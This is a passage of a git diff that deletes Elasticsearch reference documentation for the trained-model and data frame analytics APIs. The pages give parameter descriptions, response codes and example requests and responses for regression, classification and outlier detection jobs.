cache. If this number is close to the `inference_count`, then the cache -is not being appropriately used. This can be solved by increasing the cache size -or its time-to-live (TTL). See <> for the appropriate -settings. - -`failure_count`::: -(integer) -The number of failures when using the model for inference. - -`timestamp`::: -(<>) -The time when the statistics were last updated. -===== - -`ingest`::: -(object) -A collection of ingest stats for the model across all nodes. The values are -summations of the individual node statistics. The format matches the `ingest` -section in <>. - -==== - -[[ml-get-trained-models-stats-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. 
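For instance, assuming the pattern below matches no model in the cluster, a request such as the following returns a `404` because `allow_no_match` is set to `false`; with the default of `true`, it would instead return `count: 0` and an empty `trained_model_stats` array:

[source,console]
--------------------------------------------------
GET _ml/trained_models/nonexistent-model*/_stats?allow_no_match=false
--------------------------------------------------
// TEST[skip:illustrates allow_no_match only]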
- -[[ml-get-trained-models-stats-example]] -== {api-examples-title} - -The following example gets usage information for all the trained models: - -[source,console] --------------------------------------------------- -GET _ml/trained_models/_stats --------------------------------------------------- -// TEST[skip:TBD] - - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 2, - "trained_model_stats": [ - { - "model_id": "flight-delay-prediction-1574775339910", - "pipeline_count": 0, - "inference_stats": { - "failure_count": 0, - "inference_count": 4, - "cache_miss_count": 3, - "missing_all_fields_count": 0, - "timestamp": 1592399986979 - } - }, - { - "model_id": "regression-job-one-1574775307356", - "pipeline_count": 1, - "inference_stats": { - "failure_count": 0, - "inference_count": 178, - "cache_miss_count": 3, - "missing_all_fields_count": 0, - "timestamp": 1592399986979 - }, - "ingest": { - "total": { - "count": 178, - "time_in_millis": 8, - "current": 0, - "failed": 0 - }, - "pipelines": { - "flight-delay": { - "count": 178, - "time_in_millis": 8, - "current": 0, - "failed": 0, - "processors": [ - { - "inference": { - "type": "inference", - "stats": { - "count": 178, - "time_in_millis": 7, - "current": 0, - "failed": 0 - } - } - } - ] - } - } - } - } - ] -} ----- -// NOTCONSOLE diff --git a/docs/reference/ml/df-analytics/apis/get-trained-models.asciidoc b/docs/reference/ml/df-analytics/apis/get-trained-models.asciidoc deleted file mode 100644 index 11124ab8d5b..00000000000 --- a/docs/reference/ml/df-analytics/apis/get-trained-models.asciidoc +++ /dev/null @@ -1,334 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-trained-models]] -= Get trained models API -[subs="attributes"] -++++ -Get trained models -++++ - -Retrieves configuration information for a trained model. - -experimental[] - - -[[ml-get-trained-models-request]] -== {api-request-title} - -`GET _ml/trained_models/` + - -`GET _ml/trained_models/` + - -`GET _ml/trained_models/_all` + - -`GET _ml/trained_models/,` + - -`GET _ml/trained_models/` - - -[[ml-get-trained-models-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following -privileges: - -* cluster: `monitor_ml` - -For more information, see <> and -{ml-docs-setup-privileges}. - - -[[ml-get-trained-models-desc]] -== {api-description-title} - -You can get information for multiple trained models in a single API request by -using a comma-separated list of model IDs or a wildcard expression. - - -[[ml-get-trained-models-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-id] - - -[[ml-get-trained-models-query-params]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-match-models] - -`decompress_definition`:: -(Optional, Boolean) -Specifies whether the included model definition should be returned as a JSON map -(`true`) or in a custom compressed format (`false`). Defaults to `true`. - -`for_export`:: -(Optional, Boolean) -Indicates if certain fields should be removed from the model configuration on -retrieval. This allows the model to be in an acceptable format to be retrieved -and then added to another cluster. Default is false. - -`from`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=from-models] - -`include`:: -(Optional, string) -A comma delimited string of optional fields to include in the response body. 
The -default value is empty, indicating no optional fields are included. Valid -options are: - - `definition`: Includes the model definition - - `feature_importance_baseline`: Includes the baseline for {feat-imp} values. - - `total_feature_importance`: Includes the total {feat-imp} for the training - data set. -The baseline and total {feat-imp} values are returned in the `metadata` field -in the response body. - -`size`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=size-models] - -`tags`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=tags] - -[role="child_attributes"] -[[ml-get-trained-models-results]] -== {api-response-body-title} - -`trained_model_configs`:: -(array) -An array of trained model resources, which are sorted by the `model_id` value in -ascending order. -+ -.Properties of trained model resources -[%collapsible%open] -==== -`created_by`::: -(string) -Information on the creator of the trained model. - -`create_time`::: -(<>) -The time when the trained model was created. - -`default_field_map` ::: -(object) -A string to string object that contains the default field map to use -when inferring against the model. For example, data frame analytics -may train the model on a specific multi-field `foo.keyword`. -The analytics job would then supply a default field map entry for -`"foo" : "foo.keyword"`. -+ -Any field map described in the inference configuration takes precedence. - -`description`::: -(string) -The free-text description of the trained model. - -`estimated_heap_memory_usage_bytes`::: -(integer) -The estimated heap usage in bytes to keep the trained model in memory. - -`estimated_operations`::: -(integer) -The estimated number of operations to use the trained model. - -`inference_config`::: -(object) -The default configuration for inference. This can be either a `regression` -or `classification` configuration. It must match the underlying -`definition.trained_model`'s `target_type`. -+ -.Properties of `inference_config` -[%collapsible%open] -===== -`classification`:::: -(object) -Classification configuration for inference. -+ -.Properties of classification inference -[%collapsible%open] -====== -`num_top_classes`::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-classes] - -`num_top_feature_importance_values`::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-feature-importance-values] - -`prediction_field_type`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-prediction-field-type] - -`results_field`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field] - -`top_classes_results_field`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-top-classes-results-field] -====== -`regression`:::: -(object) -Regression configuration for inference. 
-+ -.Properties of regression inference -[%collapsible%open] -====== -`num_top_feature_importance_values`::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-regression-num-top-feature-importance-values] - -`results_field`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field] -====== -===== - -`input`::: -(object) -The input field names for the model definition. -+ -.Properties of `input` -[%collapsible%open] -===== -`field_names`:::: -(string) -An array of input field names for the model. -===== - -`license_level`::: -(string) -The license level of the trained model. - -`metadata`::: -(object) -An object containing metadata about the trained model. For example, models -created by {dfanalytics} contain `analysis_config` and `input` objects. -+ -.Properties of metadata -[%collapsible%open] -===== -`feature_importance_baseline`::: -(object) -An object that contains the baseline for {feat-imp} values. For {reganalysis}, -it is a single value. For {classanalysis}, there is a value for each class. - -`total_feature_importance`::: -(array) -An array of the total {feat-imp} for each feature used from -the training data set. This array of objects is returned if {dfanalytics} trained -the model and the request includes `total_feature_importance` in the `include` -request parameter. -+ -.Properties of total {feat-imp} -[%collapsible%open] -====== - -`feature_name`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-feature-name] - -`importance`::: -(object) -A collection of {feat-imp} statistics related to the training data set for this particular feature. -+ -.Properties of {feat-imp} -[%collapsible%open] -======= -`mean_magnitude`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-magnitude] - -`max`::: -(int) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-max] - -`min`::: -(int) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-min] - -======= - -`classes`::: -(array) -If the trained model is a classification model, {feat-imp} statistics are gathered -per target class value. -+ -.Properties of class {feat-imp} -[%collapsible%open] - -======= - -`class_name`::: -(string) -The target class value. Could be a string, boolean, or number. - -`importance`::: -(object) -A collection of {feat-imp} statistics related to the training data set for this particular feature. -+ -.Properties of {feat-imp} -[%collapsible%open] -======== -`mean_magnitude`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-magnitude] - -`max`::: -(int) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-max] - -`min`::: -(int) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-min] - -======== - -======= - -====== -===== - -`model_id`::: -(string) -The unique identifier of the trained model. - -`tags`::: -(string) -A comma-delimited string of tags. A trained model can have many tags, or none. - -`version`::: -(string) -The {es} version number in which the trained model was created. - -==== - -[[ml-get-trained-models-response-codes]] - -== {api-response-codes-title} - -`400`:: - If `include_model_definition` is `true`, this code indicates that more than - one model matches the ID pattern.
- -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - - -[[ml-get-trained-models-example]] -== {api-examples-title} - -The following example gets configuration information for all the trained models: - -[source,console] --------------------------------------------------- -GET _ml/trained_models/ --------------------------------------------------- -// TEST[skip:TBD] diff --git a/docs/reference/ml/df-analytics/apis/index.asciidoc b/docs/reference/ml/df-analytics/apis/index.asciidoc deleted file mode 100644 index 63a46480ce7..00000000000 --- a/docs/reference/ml/df-analytics/apis/index.asciidoc +++ /dev/null @@ -1,21 +0,0 @@ -include::ml-df-analytics-apis.asciidoc[leveloffset=+1] -//CREATE -include::put-dfanalytics.asciidoc[leveloffset=+2] -include::put-trained-models.asciidoc[leveloffset=+2] -//UPDATE -include::update-dfanalytics.asciidoc[leveloffset=+2] -//DELETE -include::delete-dfanalytics.asciidoc[leveloffset=+2] -include::delete-trained-models.asciidoc[leveloffset=+2] -//EVALUATE -include::evaluate-dfanalytics.asciidoc[leveloffset=+2] -//ESTIMATE_MEMORY_USAGE -include::explain-dfanalytics.asciidoc[leveloffset=+2] -//GET -include::get-dfanalytics.asciidoc[leveloffset=+2] -include::get-dfanalytics-stats.asciidoc[leveloffset=+2] -include::get-trained-models.asciidoc[leveloffset=+2] -include::get-trained-models-stats.asciidoc[leveloffset=+2] -//SET/START/STOP -include::start-dfanalytics.asciidoc[leveloffset=+2] -include::stop-dfanalytics.asciidoc[leveloffset=+2] diff --git a/docs/reference/ml/df-analytics/apis/ml-df-analytics-apis.asciidoc b/docs/reference/ml/df-analytics/apis/ml-df-analytics-apis.asciidoc deleted file mode 100644 index dae8757275e..00000000000 --- a/docs/reference/ml/df-analytics/apis/ml-df-analytics-apis.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-df-analytics-apis]] -= {ml-cap} {dfanalytics} APIs - -You can use the following APIs to perform {ml} {dfanalytics} activities. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - - -You can use the following APIs to perform {infer} operations. - -* <> -* <> -* <> -* <> - -You can deploy a trained model to make predictions in an ingest pipeline or in -an aggregation. Refer to the following documentation to learn more. - -* <> -* <> - - -See also <>. diff --git a/docs/reference/ml/df-analytics/apis/put-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/put-dfanalytics.asciidoc deleted file mode 100644 index d6fc3fe07b2..00000000000 --- a/docs/reference/ml/df-analytics/apis/put-dfanalytics.asciidoc +++ /dev/null @@ -1,838 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[put-dfanalytics]] -= Create {dfanalytics-jobs} API -[subs="attributes"] -++++ -Create {dfanalytics-jobs} -++++ - -Instantiates a {dfanalytics-job}. - -experimental[] - -[[ml-put-dfanalytics-request]] -== {api-request-title} - -`PUT _ml/data_frame/analytics/` - - -[[ml-put-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following built-in roles and privileges: - -* `machine_learning_admin` -* source indices: `read`, `view_index_metadata` -* destination index: `read`, `create_index`, `manage` and `index` - -For more information, see <>, <>, and -{ml-docs-setup-privileges}. - - -NOTE: The {dfanalytics-job} remembers which roles the user who created it had at -the time of creation. 
When you start the job, it performs the analysis using -those same roles. If you provide -<>, -those credentials are used instead. - -[[ml-put-dfanalytics-desc]] -== {api-description-title} - -This API creates a {dfanalytics-job} that performs an analysis on the source -indices and stores the outcome in a destination index. - -If the destination index does not exist, it is created automatically when you -start the job. See <>. - -If you supply only a subset of the {regression} or {classification} parameters, -{ml-docs}/hyperparameters.html[hyperparameter optimization] occurs. It -determines a value for each of the undefined parameters. - -[[ml-put-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define] - -[role="child_attributes"] -[[ml-put-dfanalytics-request-body]] -== {api-request-body-title} - -`allow_lazy_start`:: -(Optional, Boolean) -Specifies whether this job can start when there is insufficient {ml} node -capacity for it to be immediately assigned to a node. The default is `false`; if -a {ml} node with capacity to run the job cannot immediately be found, the -<> API returns an error. However, this is also subject to the -cluster-wide `xpack.ml.max_lazy_ml_nodes` setting. See <>. -If this option is set to `true`, the API does not return an error and the job -waits in the `starting` state until sufficient {ml} node capacity is available. - -//Begin analysis -`analysis`:: -(Required, object) -The analysis configuration, which contains the information necessary to perform -one of the following types of analysis: {classification}, {oldetection}, or -{regression}. -+ -.Properties of `analysis` -[%collapsible%open] -==== -//Begin classification -`classification`::: -(Required^*^, object) -The configuration information necessary to perform -{ml-docs}/dfa-classification.html[{classification}]. -+ -TIP: Advanced parameters are for fine-tuning {classanalysis}. They are set -automatically by hyperparameter optimization to give the minimum validation -error. It is highly recommended to use the default values unless you fully -understand the function of these parameters. -+ -.Properties of `classification` -[%collapsible%open] -===== -`class_assignment_objective`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=class-assignment-objective] - -`dependent_variable`:::: -(Required, string) -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dependent-variable] -+ -The data type of the field must be numeric (`integer`, `short`, `long`, `byte`), -categorical (`ip` or `keyword`), or boolean. There must be no more than 30 -different values in this field. 
- -`eta`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=eta] - -`feature_bag_fraction`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-bag-fraction] - -`feature_processors`:::: -(Optional, list) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors] -+ -.Properties of `feature_processors` -[%collapsible%open] -====== -`frequency_encoding`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-frequency] -+ -.Properties of `frequency_encoding` -[%collapsible%open] -======= -`feature_name`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-feat-name] - -`field`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-field] - -`frequency_map`:::: -(Required, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-frequency-map] -======= - -`ngram_encoding`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram] -+ -.Properties of `ngram_encoding` -[%collapsible%open] -======= -`feature_prefix`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram-feat-pref] - -`field`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram-field] - -`length`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram-length] - -`n_grams`:::: -(Required, array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram-ngrams] - -`start`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram-start] -======= - -`one_hot_encoding`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-one-hot] -+ -.Properties of `one_hot_encoding` -[%collapsible%open] -======= -`field`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-field] - -`hot_map`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-one-hot-map] -======= - -`target_mean_encoding`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-target-mean] -+ -.Properties of `target_mean_encoding` -[%collapsible%open] -======= -`default_value`:::: -(Required, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-target-mean-default] - -`feature_name`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-feat-name] - -`field`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-field] - -`target_map`:::: -(Required, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-target-mean-map] -======= - -====== - -`gamma`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=gamma] - -`lambda`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=lambda] - -`max_trees`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-trees] - -`num_top_classes`:::: -(Optional, integer) -Defines the number of categories for which the predicted probabilities are -reported. It must be non-negative or -1. 
If it is -1 or greater than the total -number of categories, probabilities are reported for all categories; if you have -a large number of categories, there could be a significant effect on the size of your destination index. Defaults to 2. -+ --- -NOTE: To use the -{ml-docs}/ml-dfanalytics-evaluate.html#ml-dfanalytics-class-aucroc[AUC ROC evaluation method], -`num_top_classes` must be set to `-1` or a value greater than or equal to the -total number of categories. - --- - -`num_top_feature_importance_values`:::: -(Optional, integer) -Advanced configuration option. Specifies the maximum number of -{ml-docs}/ml-feature-importance.html[{feat-imp}] values per document to return. -By default, it is zero and no {feat-imp} calculation occurs. - -`prediction_field_name`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=prediction-field-name] - -`randomize_seed`:::: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=randomize-seed] - -`training_percent`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=training-percent] -//End classification -===== -//Begin outlier_detection -`outlier_detection`::: -(Required^*^, object) -The configuration information necessary to perform -{ml-docs}/dfa-outlier-detection.html[{oldetection}]: -+ -.Properties of `outlier_detection` -[%collapsible%open] -===== -`compute_feature_influence`:::: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=compute-feature-influence] - -`feature_influence_threshold`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-influence-threshold] - -`method`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=method] - -`n_neighbors`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=n-neighbors] - -`outlier_fraction`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=outlier-fraction] - -`standardization_enabled`:::: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=standardization-enabled] -//End outlier_detection -===== -//Begin regression -`regression`::: -(Required^*^, object) -The configuration information necessary to perform -{ml-docs}/dfa-regression.html[{regression}]. -+ -TIP: Advanced parameters are for fine-tuning {reganalysis}. They are set -automatically by hyperparameter optimization to give minimum validation error. -It is highly recommended to use the default values unless you fully understand -the function of these parameters. -+ -.Properties of `regression` -[%collapsible%open] -===== -`dependent_variable`:::: -(Required, string) -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dependent-variable] -+ -The data type of the field must be numeric. - -`eta`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=eta] - -`feature_bag_fraction`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-bag-fraction] - -`feature_processors`:::: -(Optional, list) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors] - -`gamma`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=gamma] - -`lambda`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=lambda] - -`loss_function`:::: -(Optional, string) -The loss function used during {regression}. Available options are `mse` (mean -squared error), `msle` (mean squared logarithmic error), `huber` (Pseudo-Huber -loss). Defaults to `mse`. 
Refer to -{ml-docs}/dfa-regression.html#dfa-regression-lossfunction[Loss functions for {regression} analyses] -to learn more. - -`loss_function_parameter`:::: -(Optional, double) -A positive number that is used as a parameter to the `loss_function`. - -`max_trees`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-trees] - -`num_top_feature_importance_values`:::: -(Optional, integer) -Advanced configuration option. Specifies the maximum number of -{ml-docs}/ml-feature-importance.html[{feat-imp}] values per document to return. -By default, it is zero and no {feat-imp} calculation occurs. - -`prediction_field_name`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=prediction-field-name] - -`randomize_seed`:::: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=randomize-seed] - -`training_percent`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=training-percent] -===== -//End regression -==== -//End analysis - -//Begin analyzed_fields -`analyzed_fields`:: -(Optional, object) -Specify `includes` and/or `excludes` patterns to select which fields will be -included in the analysis. The patterns specified in `excludes` are applied last, -therefore `excludes` takes precedence. In other words, if the same field is -specified in both `includes` and `excludes`, then the field will not be included -in the analysis. -+ --- -[[dfa-supported-fields]] -The supported fields for each type of analysis are as follows: - -* {oldetection-cap} requires numeric or boolean data to analyze. The algorithms -don't support missing values therefore fields that have data types other than -numeric or boolean are ignored. Documents where included fields contain missing -values, null values, or an array are also ignored. Therefore the `dest` index -may contain documents that don't have an {olscore}. -* {regression-cap} supports fields that are numeric, `boolean`, `text`, -`keyword`, and `ip`. It is also tolerant of missing values. Fields that are -supported are included in the analysis, other fields are ignored. Documents -where included fields contain an array with two or more values are also -ignored. Documents in the `dest` index that don’t contain a results field are -not included in the {reganalysis}. -* {classification-cap} supports fields that are numeric, `boolean`, `text`, -`keyword`, and `ip`. It is also tolerant of missing values. Fields that are -supported are included in the analysis, other fields are ignored. Documents -where included fields contain an array with two or more values are also ignored. -Documents in the `dest` index that don’t contain a results field are not -included in the {classanalysis}. {classanalysis-cap} can be improved by mapping -ordinal variable values to a single number. For example, in case of age ranges, -you can model the values as "0-14" = 0, "15-24" = 1, "25-34" = 2, and so on. - -If `analyzed_fields` is not set, only the relevant fields will be included. For -example, all the numeric fields for {oldetection}. For more information about -field selection, see <>. --- -+ -.Properties of `analyzed_fields` -[%collapsible%open] -==== -`excludes`::: -(Optional, array) -An array of strings that defines the fields that will be excluded from the -analysis. You do not need to add fields with unsupported data types to -`excludes`, these fields are excluded from the analysis automatically. 
- -`includes`::: -(Optional, array) -An array of strings that defines the fields that will be included in the -analysis. -//End analyzed_fields -==== - -`description`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=description-dfa] - -`dest`:: -(Required, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dest] - -`max_num_threads`:: -(Optional, integer) -The maximum number of threads to be used by the analysis. -The default value is `1`. Using more threads may decrease the time -necessary to complete the analysis at the cost of using more CPU. -Note that the process may use additional threads for operational -functionality other than the analysis itself. - -`model_memory_limit`:: -(Optional, string) -The approximate maximum amount of memory resources that are permitted for -analytical processing. The default value for {dfanalytics-jobs} is `1gb`. If -your `elasticsearch.yml` file contains an `xpack.ml.max_model_memory_limit` -setting, an error occurs when you try to create {dfanalytics-jobs} that have -`model_memory_limit` values greater than that setting. For more information, see -<>. - -`source`:: -(object) -The configuration of how to source the analysis data. It requires an `index`. -Optionally, `query` and `_source` may be specified. -+ -.Properties of `source` -[%collapsible%open] -==== -`index`::: -(Required, string or array) Index or indices on which to perform the analysis. -It can be a single index or index pattern as well as an array of indices or -patterns. -+ -WARNING: If your source indices contain documents with the same IDs, only the -document that is indexed last appears in the destination index. - -`query`::: -(Optional, object) The {es} query domain-specific language (<>). -This value corresponds to the query object in an {es} search POST body. All the -options that are supported by {es} can be used, as this object is passed -verbatim to {es}. By default, this property has the following value: -`{"match_all": {}}`. - -`_source`::: -(Optional, object) Specify `includes` and/or `excludes` patterns to select which -fields will be present in the destination. Fields that are excluded cannot be -included in the analysis. -+ -.Properties of `_source` -[%collapsible%open] -===== -`includes`:::: -(array) An array of strings that defines the fields that will be included in the -destination. - -`excludes`:::: -(array) An array of strings that defines the fields that will be excluded from -the destination. -===== -==== - - - -[[ml-put-dfanalytics-example]] -== {api-examples-title} - - -[[ml-put-dfanalytics-example-preprocess]] -=== Preprocessing actions example - -The following example shows how to limit the scope of the analysis to certain -fields, specify excluded fields in the destination index, and use a query to -filter your data before analysis. 
-
-[source,console]
---------------------------------------------------
-PUT _ml/data_frame/analytics/model-flight-delays-pre
-{
-  "source": {
-    "index": [
-      "kibana_sample_data_flights" <1>
-    ],
-    "query": { <2>
-      "range": {
-        "DistanceKilometers": {
-          "gt": 0
-        }
-      }
-    },
-    "_source": { <3>
-      "includes": [],
-      "excludes": [
-        "FlightDelay",
-        "FlightDelayType"
-      ]
-    }
-  },
-  "dest": { <4>
-    "index": "df-flight-delays",
-    "results_field": "ml-results"
-  },
-  "analysis": {
-    "regression": {
-      "dependent_variable": "FlightDelayMin",
-      "training_percent": 90
-    }
-  },
-  "analyzed_fields": { <5>
-    "includes": [],
-    "excludes": [
-      "FlightNum"
-    ]
-  },
-  "model_memory_limit": "100mb"
-}
---------------------------------------------------
-// TEST[skip:setup kibana sample data]
-
-<1> Source index to analyze.
-<2> This query filters out entire documents that will not be present in the
-destination index.
-<3> The `_source` object defines fields in the dataset that will be included or
-excluded in the destination index.
-<4> Defines the destination index that contains the results of the analysis and
-the fields of the source index specified in the `_source` object. Also defines
-the name of the `results_field`.
-<5> Specifies fields to be included in or excluded from the analysis. This does
-not affect whether the fields are present in the destination index; it only
-affects whether they are used in the analysis.
-
-In this example, all the fields of the source index are included in the
-destination index except `FlightDelay` and `FlightDelayType`, because these are
-defined as excluded fields by the `excludes` parameter of the `_source` object.
-The `FlightNum` field is included in the destination index; however, it is not
-included in the analysis because it is explicitly listed as an excluded field by
-the `excludes` parameter of the `analyzed_fields` object.
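-
-A typical follow-up, sketched below rather than taken from the original
-example, is to start the job and then follow its progress with the get
-{dfanalytics} stats API. The requests assume the `model-flight-delays-pre` job
-above was created successfully:
-
-[source,console]
---------------------------------------------------
-POST _ml/data_frame/analytics/model-flight-delays-pre/_start
-
-GET _ml/data_frame/analytics/model-flight-delays-pre/_stats
---------------------------------------------------
-// TEST[skip:setup kibana sample data]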
- - -[[ml-put-dfanalytics-example-od]] -=== {oldetection-cap} example - -The following example creates the `loganalytics` {dfanalytics-job}, the analysis -type is `outlier_detection`: - -[source,console] --------------------------------------------------- -PUT _ml/data_frame/analytics/loganalytics -{ - "description": "Outlier detection on log data", - "source": { - "index": "logdata" - }, - "dest": { - "index": "logdata_out" - }, - "analysis": { - "outlier_detection": { - "compute_feature_influence": true, - "outlier_fraction": 0.05, - "standardization_enabled": true - } - } -} --------------------------------------------------- -// TEST[setup:setup_logdata] - - -The API returns the following result: - -[source,console-result] ----- -{ - "id": "loganalytics", - "description": "Outlier detection on log data", - "source": { - "index": ["logdata"], - "query": { - "match_all": {} - } - }, - "dest": { - "index": "logdata_out", - "results_field": "ml" - }, - "analysis": { - "outlier_detection": { - "compute_feature_influence": true, - "outlier_fraction": 0.05, - "standardization_enabled": true - } - }, - "model_memory_limit": "1gb", - "create_time" : 1562265491319, - "version" : "7.6.0", - "allow_lazy_start" : false, - "max_num_threads": 1 -} ----- -// TESTRESPONSE[s/1562265491319/$body.$_path/] -// TESTRESPONSE[s/"version" : "7.6.0"/"version" : $body.version/] - - -[[ml-put-dfanalytics-example-r]] -=== {regression-cap} examples - -The following example creates the `house_price_regression_analysis` -{dfanalytics-job}, the analysis type is `regression`: - -[source,console] --------------------------------------------------- -PUT _ml/data_frame/analytics/house_price_regression_analysis -{ - "source": { - "index": "houses_sold_last_10_yrs" - }, - "dest": { - "index": "house_price_predictions" - }, - "analysis": - { - "regression": { - "dependent_variable": "price" - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - - -The API returns the following result: - -[source,console-result] ----- -{ - "id" : "house_price_regression_analysis", - "source" : { - "index" : [ - "houses_sold_last_10_yrs" - ], - "query" : { - "match_all" : { } - } - }, - "dest" : { - "index" : "house_price_predictions", - "results_field" : "ml" - }, - "analysis" : { - "regression" : { - "dependent_variable" : "price", - "training_percent" : 100 - } - }, - "model_memory_limit" : "1gb", - "create_time" : 1567168659127, - "version" : "8.0.0", - "allow_lazy_start" : false -} ----- -// TESTRESPONSE[s/1567168659127/$body.$_path/] -// TESTRESPONSE[s/"version": "8.0.0"/"version": $body.version/] - - -The following example creates a job and specifies a training percent: - -[source,console] --------------------------------------------------- -PUT _ml/data_frame/analytics/student_performance_mathematics_0.3 -{ - "source": { - "index": "student_performance_mathematics" - }, - "dest": { - "index":"student_performance_mathematics_reg" - }, - "analysis": - { - "regression": { - "dependent_variable": "G3", - "training_percent": 70, <1> - "randomize_seed": 19673948271 <2> - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -<1> The percentage of the data set that is used for training the model. -<2> The seed that is used to randomly pick which data is used for training. 
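-
-After a {regression} job like this one completes, you can check how well the
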